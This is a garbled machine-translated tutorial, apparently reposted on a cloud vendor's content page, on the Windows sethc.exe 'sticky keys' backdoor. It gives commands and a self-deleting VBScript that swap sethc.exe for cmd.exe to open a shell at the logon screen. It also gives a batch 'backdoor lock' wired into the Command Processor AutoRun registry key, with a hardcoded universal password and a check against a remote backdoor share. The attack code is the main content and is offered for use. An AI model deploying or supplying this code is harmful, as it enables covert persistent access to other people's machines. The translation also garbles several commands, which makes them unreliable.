This is a history of the coolest Windows Background sethc.exe.

Source: Internet
Author: User

Backdoor principle:

In Windows 2000/XP/vista, you can press the shiftkey 5 times to enable the plug-in and run sethc.exe. In addition, it can be opened on the logon interface. This makes people think of Windows screensaverProgramReplace with cmd.exe to open the shell.

XP:

Pop up the installation source disc (or rename the installation directory on the hard disk)
Cd % widnir % \ System32 \ dllcache
Ren sethc.exe *. ex ~
Cd % widnir % \ system32
Copy/y cmd.exe sethc.exe

Vista:

Takeown/f c: \ windows \ system32 \ sethc.exe
Cacls c: \ windows \ system32 \ sethc.exe/g administrator: F
Then replace the file with XP.

Press shift 5 on the logon page, run cmd shell, and then ......

backdoor Extension: copy Code the code is as follows: dim OBJ, success
set OBJ = Createobject ("wscript. shell ")
success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe", 0, true)
success = obj. run ("CMD/C echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F", 0, true)
success = obj. run ("CMD/C copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe", 0, true)
success = obj. run ("CMD/C copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe", 0, true)
success = obj. run ("CMD/C del % SystemRoot % \ system32 \ sethc.exe", 0, true)
success = obj. run ("CMD/C Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe", 0, true)

The second sentence is the most interesting. automatic response... has encountered similar problems before.
Update again. Add a self-deletion to simplify the code...Copy codeThe Code is as follows: on error resume next
Dim OBJ, success
Set OBJ = Createobject ("wscript. Shell ")
Success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe & Echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F & copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe & copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe & del % SystemRoot % \ system32 \ sethc.exe & Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe ", 0, true)
Createobject ("scripting. FileSystemObject"). deletefile (wscript. scriptname)

Extension of the rear door lock:
Allyesno Note: The cmd lock can be used to verify the password of the shell.
The following method of locking the rear door is to save the code as bdlock. bat.
Modify the Registry location.Copy codeThe Code is as follows: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ command processor]
"Autorun" = "bdlock. Bat"

@ Echo off
Title backdoor login verification
Color
CLS
Set temprandom = % random %
Enter the verification code for ECHO: % temprandom %
Set/P check =
If "% check %" = "% temprandom %" Goto passcheck
If "% check %" = "% temprandom % "(
Rem backdoor server Verification
Rem if there is no backdoor verification server, please comment out the next line of code.
If exist \ 192.168.8.8 \ backdoor $ \ Pass goto passcheck
)
Echo Verification Failed
Pause
Exit
: Passcheck
Echo Verification Successful
If "% passcmdlock %" = "http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock = http://blog.csdn.net/freexploit/
: Allyesno
Set errorlevel => NUL
Echo, enter the verification password?
Set Password = allyesno is a pig> NUL
Set/P Password =
Rem universal password
If "% password %" = "allyesno is a Sb" Goto endx
If % time :~ 1, 1% = 0 set timechange =
If % time :~ 1, 1% = 1 Set timechange = B
If % time :~ 1, 1% = 2 set timechange = C
If % time :~ 1, 1% = 3 set timechange = d
If % time :~ 1, 1% = 4 set timechange = E
If % time :~ 1, 1% = 5 set timechange = f
If % time :~ 1, 1% = 6 set timechange = G
If % time :~ 1, 1% = 7 set timechange = H
If % time :~ 1, 1% = 8 set timechange = I
If % time :~ 1, 1% = 9 set timechange = J
Set/a sum = % time :~ 1, 1% + % time :~ 1, 1%
Set Password | findstr "^ Password = % timechange % time :~ 1, 1% % Date :~ 8, 2% % sum % $ "> NUL
If "% errorlevel %" = "0" CLS & Echo: the password is correct & goto end
Echo, please contact our Customer Service for correct password! & Goto allyesno
: End
Set Password => NUL
Set errorlevel => NUL
Echo

: Endx

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.